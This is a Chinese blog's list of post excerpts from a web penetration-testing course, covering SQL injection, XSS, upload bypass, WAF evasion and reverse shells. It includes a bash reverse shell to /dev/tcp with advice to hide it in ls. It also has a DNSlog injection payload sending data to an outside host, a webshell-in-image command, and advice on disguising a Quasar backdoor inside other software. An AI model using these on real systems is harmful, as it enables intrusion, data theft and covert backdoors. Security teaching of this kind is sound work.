免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。代码类过滤:Xss-labsHttpOnly属性过滤防读取<script>alert(1)</script>绕过httponly:浏览器未保存帐号密码:需要xss产生登录地址,利用表单劫持浏览器保存帐号密码:产生在后台的xss,存储型xss如留言等,浏览器读取帐号密码演示案例:➢ HttpOnly安全过滤测试➢ HttpOnly安全过滤绕过思
原创
69阅读
1评论
0点赞
发布博客于 2 月前

26 WEB漏洞-XSS跨站之订单及Shell箱子反杀记

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#XSS平台及工具使用#XSS经典应用案例测试#Webshell后门中的后门#Session与Cookie获取问题document.cookie等配合读取phpinfo等信息源码等演示案例:● 某营销订单系统XSS盲打_平台● 某Shell箱子系统XSS盲打_工具● 其他参考应用案例-后台权限维持● 工具Http/s数据包提交Postman使用涉及资源:htt
原创
34阅读
0评论
0点赞
发布博客于 2 月前

25 WEB漏洞-XSS跨站之原理分类及攻击手法

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#XSS跨站漏洞产生原理,危害,特点?本质,产生层面,函数类,漏洞操作对应层,危害影响,浏览器内核版本等#XSS跨站漏洞分类:反射,存储,DOM反射型:发包 x= xss => x.xss => 回包存储型:发包 x=xss => x.xss =>写到数据库某个表 => x,ss => 回显dom型:发包 x=xss => 本地浏
原创
61阅读
0评论
0点赞
发布博客于 2 月前

24 WEB漏洞-文件上传之WAF绕过及安全修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#上传参数名解析:明确哪些东西能修改?Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件MIME,视情况更改#常见绕过方法:数据溢出-防匹配(xxx…)符号变异-防匹配(’ " ;)数据截断-防匹配(%00 ; 换行)重复数据-防匹配(参数多次,如filename="x.jp
原创
30阅读
0评论
0点赞
发布博客于 2 月前

23 WEB漏洞-文件上传之解析漏洞编辑器安全

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。各个平台解析漏洞IIS,Apache,Nginx各个WEB编辑器安全(inurl:编辑器名,后面你懂的)https://navisec.it/编辑器漏洞手册/各个CMS文件上传简要说明wordpress,phpcms,演示案例:➢ 几种中间件解析漏洞简要演示参考共享的中间件漏洞PDF文件IIS6/7简要说明-本地搭建Apache配置安全–vulhubApache
原创
32阅读
0评论
0点赞
发布博客于 2 月前

22 WEB漏洞-文件上传之内容逻辑数组绕过

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。图片一句话制作方法(或者打开文件把代码加进去):copy 1.png /b + shell.php /a webshell.jpg文件头检测图像文件信息判断逻辑安全=二次渲染逻辑安全-条件竞争目录命名-x.php/.脚本函数漏洞-CVE-2015-2348数组接受+目录命名演示案例:● Uploadlabs-pass13-20关卡测试● CVE-2017-126
原创
33阅读
1评论
0点赞
发布博客于 2 月前

21 WEB漏洞-文件上传之后端黑白名单绕过

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。文件上传常见验证:后缀名,类型,文件头等后缀名:黑名单,白名单黑名单: 明确不让上传的格式后缀asp php jsp aspx cgi warphp5 Phtml**白名单:**明确可以上传的格式后缀(大多数网站都是白名单,更安全)jpg png zip rar gif ……文件类型:MIME信息uploadlabs平台上传一张图片时抓包,抓包后看参数filenam
原创
61阅读
0评论
0点赞
发布博客于 2 月前

20 WEB漏洞-文件上传之基础及过滤方式

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。什么是文件上传漏洞?文件上传漏洞有哪些危害?比如上传后门文件,进而拿权限等等(一句话木马)文件上传漏洞如何查找及判断?扫描、会员中心、后台系统、代码分析等等文件上传漏洞有哪些需要注意的地方?关于文件上传漏洞在实际应用中的说明?演示案例:✧ 常规文件上传地址的获取说明比如vip账号的url(例:https://www.easyicon.net/vip/),再用铸剑或者
原创
22阅读
0评论
0点赞
发布博客于 2 月前

19 WEB漏洞-SQLMAP绕过WAF

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层等,以便我们更灵活地去构造Payload,从而可以和各种WAF进行对抗,甚至绕过安全防御措施进行漏洞利用。演示案例:✧ 简要其他绕过方式学习✧ FUZZ绕过脚本结合编写测试✧ 阿里云盾防SQL注入简要分析✧ 安全狗+云盾SQL注入插件脚本编写%23x%0aunion%23x%0Aselect%2
原创
44阅读
0评论
0点赞
发布博客于 2 月前

18 WEB漏洞-堆叠及WAF绕过注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#堆叠查询注入Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。#phpstudy+safedog安装找不到
原创
75阅读
0评论
1点赞
发布博客于 2 月前

17 WEB漏洞-二次,加解密,DNS等注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#加解密,二次,DNSlog注入注入原理,演示案例,实际应用(中转注入)DNSlog:解决了盲注不能回显数据,效率低的问题http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and if((select load_file(concat('\\\\',(select version()),'.1t7i2f.ceye.io\\abc'))),
原创
119阅读
0评论
0点赞
发布博客于 2 月前

16 WEB漏洞-查询方式及报错盲注

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。涉及知识点:#补充:上课的Access暴力猜解不出的问题?Access偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察URL
原创
52阅读
0评论
0点赞
发布博客于 2 月前

15 WEB漏洞-Oracle,MongoDB等注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。Access,mysql,mssql,mongoDB,postgresql,sqlite,oracle,sybase等#补充上课Json注入案例分析https://tianchi.aliyun.com/competition/entrance/531796/rankingList#简要学习各种数据库的注入特点数据库架构组成,数据库高权限操作#简要学习各种注入工具的使用指南
原创
33阅读
0评论
1点赞
发布博客于 2 月前

14 WEB漏洞-类型及提交注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 在真实SQL注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型和提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入。#简要明确参数类型数字,字符,搜索,JSON等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP头等其中SQL语句干扰符号:’,",%,),}等,具体需看写法演示案例:
原创
30阅读
0评论
0点赞
发布博客于 2 月前

13 WEB漏洞-MYSQL注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。高权限注入及低权限注入#跨库查询及应用思路information_schema表特性,记录库名,表名,列名对应表获
原创
23阅读
0评论
0点赞
发布博客于 2 月前

12 WEB漏洞-SQL注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 在本体系学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。忍者安全测试系统使用说明#上述思维导图简要说明#SQL注入安全测试中危害#SQL注入产生原理详细分析可控变量,带入数据库
原创
40阅读
0评论
0点赞
发布博客于 2 月前

11 WEB漏洞-必懂知识点

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 本章节将讲解各种WEB层面上的有那些漏洞类型,具体漏洞的危害等级,以简要的影响范围测试进行实例分析,思维导图中的漏洞也是后面我们将要学习到的各个知识点,其中针对漏洞的形成原理,如何发现,如何利用将是本章节学习的重点内容。简要知识:CTF,SRC,红蓝对抗,实战等#简要说明以上漏洞危害情况#简要说明以上漏洞等级划分#简要说明以上漏洞重点内容#简要说明以上漏洞形势问题
原创
42阅读
1评论
0点赞
发布博客于 2 月前

10 信息收集-资产监控拓展

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#Github监控便于收集整理最新exp或poc便于发现相关测试目标的资产#各种子域名查询#DNS,备案,证书#全球节点请求cdn枚举爆破或解析子域名对应便于发现管理员相关的注册信息#黑暗引擎相关搜索fofa,shodan,zoomeye#微信公众号接口获取#内部应用内部接口演示案例:✧ 监控最新的EXP发布及其他# Title: wechat push
原创
50阅读
0评论
0点赞
发布博客于 2 月前

09 信息收集-APP及其他资产等

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言:在安全测试中,若WEB无法取得进展或无WEB的情况下,我们需要借助APP或其他资产在进行信息收集,从而开展后续渗透,那么其中的信息收集就尤为重要,我们用案例讲解试试如何!#APP提取一键反编译提取#APP抓数据包进行工具配合#各种第三方应用相关探针技术#各种服务接口信息相关探针技术演示案例:APP提取及抓包及后续配合某APK一键提取反编译利用burp历史抓更多UR
原创
144阅读
0评论
0点赞
发布博客于 2 月前

08 信息收集-架构,搭建,WAF等

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。  在安全测试中,信息收集是非常重要的一个环节,此环节的信息将影响到后续的成功几率,掌握信息的多少将决定发现漏洞机会大小,换言之决定着是否能完成目标的测试任务。也可以很直接的跟大家说:渗透测试的思路就是从信息收集这里开始,你与大牛的差距也是从这里开始的!CMS识别技术源码获取技术架构信息获取站点搭建分析搭建习惯-目录型站点搭建习惯-端口类站点搭建习惯-子域名站点搭建习惯
原创
73阅读
0评论
0点赞
发布博客于 2 月前

07 信息收集-CDN绕过

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。也可以看我这篇博客:判断是否存在CDN并绕过,寻找真实IP  CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。但在安全测试过程中,若目标存在CDN服务,将会影响到后
原创
37阅读
0评论
0点赞
发布博客于 2 月前

06 渗透基础入门:加密编码算法

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 在渗透测试中,常见的密码等敏感信息会采用加密处理,其中作为安全测试人员必须要了解常见的加密方式,才能为后续的安全测试做好准备,本次课程将讲解各种加密编码等知识,便于后期的学习和发展。#常见加密编码等算法解析MD5,SHA,ASC,进制,时间戳,URL,BASE64,Unescape,AES,DES等#常见加密形式算法解析直接加密,带salt,带密码,带偏移,带位数,带模
原创
24阅读
0评论
0点赞
发布博客于 2 月前

05 渗透基础入门-系统及数据库等

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 除去前期讲到过的搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到WEB或服务器的安全,导致网站或服务器权限的获取。操作系统层面识别操作系统常见方法(nmap、windows大小写不敏感、linux大小写敏感)简要两者区别及识别意义操作系统层面漏洞类型对应意义简要操作系统层面漏洞影响范围数据库层面识别数据库
原创
27阅读
0评论
0点赞
发布博客于 2 月前

04 渗透测试基础入门-WEB源码拓展

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言:  WEB源码在安全测试中是非常重要的信息来源,可以用来代码审计漏洞也可以用来做信息突破口,其中WEB源码有很多技术需要简明分析。  比如:获取某ASP源码后可以采用默认数据库下载为突破,获取某其他脚本源码漏洞可以进行代码审计挖掘或分析其业务逻辑等,总之源码的获取将为后期的安全测试提供了更多的思路。一、知识点:✓ 关于WEB源码目录结构✓ 关于WEB源码脚本类型✓ 关于
原创
47阅读
1评论
0点赞
发布博客于 2 月前

03 渗透基础入门-搭建安全拓展

涉及知识✧ 常见搭建平台脚本启用✧ 域名IP目录解析安全问题✧ 常见文件后缀解析对应安全✧ 常见安全测试中的安全防护✧ WEB后门与用户及文件权限#ASP,PHP,ASPX,JSP,PY,JAVAWEB等环境#WEB源码中敏感文件后台路径,数据库配置文件,备份文件等#IP或域名解析WEB源码目录对应下的存在的安全问题域名访问,IP访问(结合类似备份文件目录)#脚本后缀对应解析(其他格式可相同-上传安全)#存在下载或为解析问题#常见防护中的IP验证,域名验证等  用ip访问的权限比
原创
26阅读
0评论
0点赞
发布博客于 2 月前

几种Linux下反弹shell的方法

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行nc -lvp port表示显示执行过程监听端口在目标主机上执行bash -i >& /dev/tcp/ip/port 0>$1(扩展:可以把此命令嵌入到常用的 ls 命令,神不知鬼不觉的让对方给你建立一个反弹shell,岂不妙哉!)这样就可以在我们的主机上执行命令了二、nc和python在我
原创
13阅读
0评论
0点赞
发布博客于 2 月前

漏洞复现之 Apache HTTPD 多后缀解析漏洞

漏洞简介:  Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器:AddHandler ap
原创
35阅读
0评论
0点赞
发布博客于 2 月前

linux解决dpkg returned an error code (1)

问题:有时候,在命令安装软件的时候,无论什么软件都装不了,最后总是出现Sub-process /usr/bin/dpkg returned an error code (1)很有可能你是动了有关于dpkg的文件或进程。解决方法:1.进入目录cd /var/lib/dpkg2.删除(备份)文件sudo mv info info.baksudo3.重新创建mkdir info4.再执行安装的命令,去重新安装软件...
原创
77阅读
0评论
2点赞
发布博客于 2 月前

02 渗透基础入门:数据包拓展

一、网站解析对应#简要网站搭建过程涉及到的攻击层面?(源码,搭建平台,系统,网络层等)涉及到的安全问题?(目录,敏感文件,弱口令,IP及域名等)二、HTTP/S数据包#Request请求数据包#Response返回数据包#HTTP/HTTPS具体区别?#HTTP简要通信过程建立连接——>发送请求数据包——>返回响应数据包——>关闭连接1.浏览器建立与web服务器之间的连接2.浏览器将请求数据打包(生成请求数据包)并发送到web服务器3.web服务器将处理结果
原创
64阅读
0评论
0点赞
发布博客于 2 月前

渗透工具之hackbar 安装

hackbar 简介:firefox 浏览器的一个插件,可以帮劣渗透测试者完成 sql 注入、xss 漏洞注入。下载地址:https://github.com/HCTYMFF/hackbar2.1.3上传 hackbar 插件包到 kali 系统上:root@kali:~# unzip hackbar2.1.3-master.ziproot@kali:~# ls hackbar2.1.3-master #查看获得的内容{4c98c9c7-fc13-4622-b08a-a18923469c1c}.x
原创
146阅读
0评论
0点赞
发布博客于 2 月前

JDK11 JAVA11下载安装与快速配置环境变量教程

https://blog.csdn.net/weixin_40928253/article/details/83590136
转载
156阅读
0评论
0点赞
发布博客于 2 月前

exe后门程序生成之Quasar

1.下载并配置Quasar下载地址:https://github.com/quasar/QuasarRAT/releases如何配置:https://github.com/quasar/Quasar/wiki/Getting-Started2.生成后门文件添加ip(注意是本机ip)和端口(未占用)如果要设置密码就不用勾上!!!点击右下角的Build Client生成exe后门文件:把此文件放到靶机上运行(此处玩法有很多,比如内置隐藏到x软件带动它启动,此处省略一万字。。。。)当此程序
原创
120阅读
0评论
0点赞
发布博客于 2 月前

WINDOWS查看端口命令

WINDOWS查看端口命令cmd中netstat -an  显示出电脑中所有被打开的端口列表netstat -ano  显示出所有占用端口的列表netstat -ano | findstr "80"  显示出80端口占用的详细情况tasklist | findstr "680"    查询端口具体哪个应用占用...
原创
121阅读
0评论
0点赞
发布博客于 2 月前

Net方式实现主机与虚拟机互相ping通

之前通过用桥接模式实现了主机和虚拟机进行互ping,发现了一个问题。当我换了网络环境之后,就会发生ping不通的情况。今天查了点资料,运用net方式实现主机和虚拟机进行互ping就不会发生了。**NAT模式:**通俗的讲,主机ping虚拟机,就是有一个转换器将主机ip转换与虚拟机网卡ip到同一网段,实现可以通信;反之亦然。虚拟机网络连接方式选择NAT(默认网关192.168.239.2也建议写上去,或者自动获取,然后再物理机上运行cmd终端,执行ipconfig查看对应的网卡ip信息是否
原创
21阅读
0评论
0点赞
发布博客于 2 月前

虚拟机网络NAT模式配置静态IP

虚拟机网络连接方式安装好虚拟机以后,在网络连接里面可以看到多了两块网卡:其中VMnet1是虚拟机Host-only模式的网络接口,VMnet8是NAT模式的网络接口。虚拟机常见有三种网络连接方式:如下图:1. Bridged(桥接模式)  桥接模式下,VMware虚拟出来的操作系统就像是局域网中的一独立的主机,它可以访问网内任何一台机器。不过你需要空闲的IP地址,并且需要手工为虚拟系统配置IP地址、子网掩码,而且还要和宿主机器处于同一网段,这样虚拟系统才能和宿主机器进行通信。  如果你想利用
原创
104阅读
0评论
0点赞
发布博客于 2 月前

01 渗透基础入门-概念名词

一、域名1. 什么是域名?  域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)。  由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。比如www.baidu.com,这就
原创
111阅读
1评论
0点赞
发布博客于 2 月前

Shell文本处理三剑客之sed的使用

sed命令替换字符包含斜杠\,引号的处理方法在字符替换中,可能会遇见引号,“/”等的替换,这时应该注意,sed的命令原型是:sed -i "s/oldstring/goalstring/g" file如果一个路径是data/path/abc,现在要将此路径换成一个字符串cde但是这时跟在s后边的其实是分隔符,用以将oldstring替换成cde;他可以使用任意字符,这时如果字符串中有“/”,就会发生混乱,在这个时候可以用#当做分隔符,就变成sed -i "s#abc#cde#g" file
原创
4阅读
0评论
0点赞
发布博客于 2 月前

kali安装谷歌拼音

安装命令:sudo apt-get install fcitx-googlepinyin如果安装过程中提示安装依赖关系有问题,执行:apt-get install -f
原创
72阅读
1评论
0点赞
发布博客于 2 月前

Python 远程开关机

原文链接:https://mp.weixin.qq.com/s/RSod4XWxyzL32eNcrXLjUQ源码:python远程关机.pydef wake_up(request, mac='DC-4A-3E-78-3E-0A'): MAC = mac BROADCAST = "192.168.0.255" if len(MAC) != 17: raise ValueError("MAC address should be set as form 'XX-XX-
转载
35阅读
1评论
0点赞
发布博客于 2 月前

排序算法(冒泡排序,选择排序,插入排序,快速排序)

各种排序算法动画演示http://www.webhek.com/misc/comparison-sort///#define _CRT_SECURE_NO_WARNINGS#include<stdio.h>/*冒泡选择插入快速*/void bulletSort(int arr[], int len);void selectSort(int arr[], int len);void insertSort(int arr[], int len);void quickSort(
原创
26阅读
1评论
0点赞
发布博客于 2 月前

bash: pip3:未找到命令

执行pip3命令时出现如下错误:解决办法:apt-get install python3-pip
原创
214阅读
1评论
0点赞
发布博客于 2 月前

解决问题:E: Could not get lock /var/lib/dpkg/lock – open (11: Resource temporarily unavailable)

是不是在使用ubuntu的时候特别是安装或更新的时候会出现下面的情况: E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration direc"不可描述"y (/var/lib/dpkg/), is another process using it?`导致没办法进行下去?最简单直接的办法:sudo rm
原创
150阅读
1评论
0点赞
发布博客于 2 月前

vi/vim替换字符

vim字符串替换vi/vim 中可以使用 :s 命令来替换字符串。以前只会使用一种格式来全文替换,今天发现该命令有很多种写法(vi 真是强大啊,还有很多需要学习),记录几种在此,方便以后查询。 替换  :s/vivian/sky/ 替换当前行第一个 vivian 为 sky  :s/vivian/sky/g 替换当前行所有 vivian 为 sky  :n,$s/vivian/sky/ 替换第 n 行开始到最后一行中每一行的第一个 vivian 为 sky  :n,$s/vivian/sky/g
原创
190阅读
0评论
0点赞
发布博客于 2 月前

20 内置模块

python中表示时间的几种方式:1.时间戳: 时间戳表示是从1970年1月1号 00:00:00开始到现在按秒计算的偏移量2.UTC(世界协调时): 就是格林威治天文时间,也是世界标准时间。在中国为UTC+83.元组方式: struct_time元组共有9个元素,返回struct_time的函数主要有gmtime(),localtime(),strptime()。struct_timetm_year :年tm_mon :月(1-12)tm_mday :日(1-31)tm_hour
原创
51阅读
1评论
0点赞
发布博客于 2 月前

19 正则

1.正则基础2.高级用法3.贪婪与非贪婪4.原生字符串#### 匹配单个字符| 字符 | 功能 || :--: | :------------------------------- || . | 匹配任意1个字符(除了
) || [ ] | 匹配[ ]中列举的字符 || \d | 匹配数字,即0-9 || \D | 匹配非数
原创
11阅读
0评论
0点赞
发布博客于 2 月前

18 协程

1.协程介绍2.greenlet# 1.简单实现协程# import time# def work1():# while True:# yield 1# time.sleep(0.5)## def work2():# while True:# yield 2# time.sleep(0.5)## if __name__ == '__main__':# w1 = work1()
原创
8阅读
0评论
0点赞
发布博客于 2 月前

17 进程

1.进程介绍2.进程创建3.进程间的通信4.进程池# 进程介绍:一个程序运行起来后,代码+用到的资源称之为进程# 1.进程状态:# 就绪态:正在等CPU执行# 执行态:CPU正在执行其功能# 等待态:等待某些条件满足# import time# print('程序开始') # 运行状态# name = input('请输入你的名字:') # 用户输入,进入阻塞# print(name) # 运行状态# time.sleep(1)
原创
7阅读
0评论
0点赞
发布博客于 2 月前